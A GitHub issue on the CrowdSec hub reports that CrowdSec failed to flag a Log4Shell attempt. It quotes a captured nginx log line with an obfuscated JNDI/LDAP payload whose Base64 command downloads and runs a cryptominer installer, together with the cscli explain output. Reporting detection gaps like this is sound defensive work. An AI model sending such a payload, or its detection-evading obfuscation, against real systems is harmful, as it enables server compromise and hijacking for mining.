crowdsecurity/hub

missing log4j pattern bypass

yanbreu opened this issue ยท 0 comments

yanbreu commented

Describe the bug
My IDS detected a log4j attempt but crowdsec didn't.
I hope this is the right place to report this.

To Reproduce
Nginx Log:

1.2.3.4 - - [11/Dec/2023:04:41:01 +0100] "GET / HTTP/1.1" 200 3 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')"

cscli explain:

/ # cscli explain --dsn file://tmp/nginx.log --type nginx
line: 1.2.3.4 - - [11/Dec/2023:04:41:01 +0100] "GET / HTTP/1.1" 200 3 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')"
        โ”œ s00-raw
        |       โ”œ ๐Ÿ”ด crowdsecurity/cri-logs
        |       โ”œ ๐Ÿ”ด crowdsecurity/docker-logs
        |       โ”œ ๐ŸŸข crowdsecurity/non-syslog (+5 ~8)
        |       โ”” ๐Ÿ”ด crowdsecurity/syslog-logs
        โ”œ s01-parse
        |       โ”œ ๐Ÿ”ด LePresidente/authelia-logs
        |       โ”” ๐ŸŸข crowdsecurity/nginx-logs (+22 ~2)
        โ”œ s02-enrich
        |       โ”œ ๐ŸŸข crowdsecurity/dateparse-enrich (+2 ~2)
        |       โ”œ ๐ŸŸข crowdsecurity/geoip-enrich (+10)
        |       โ”œ ๐ŸŸข crowdsecurity/http-logs (+6)
        |       โ”” ๐ŸŸข crowdsecurity/whitelists (unchanged)
        โ”œ-------- parser success ๐ŸŸข
        โ”œ Scenarios
                โ”” ๐ŸŸข crowdsecurity/http-crawl-non_statics

Expected behavior
Request should get flagged and blocked.

Additional context
See Suricata rule:
https://github.com/ptresearch/AttackDetection/blob/master/Log4Shell/log4shell.rules#L1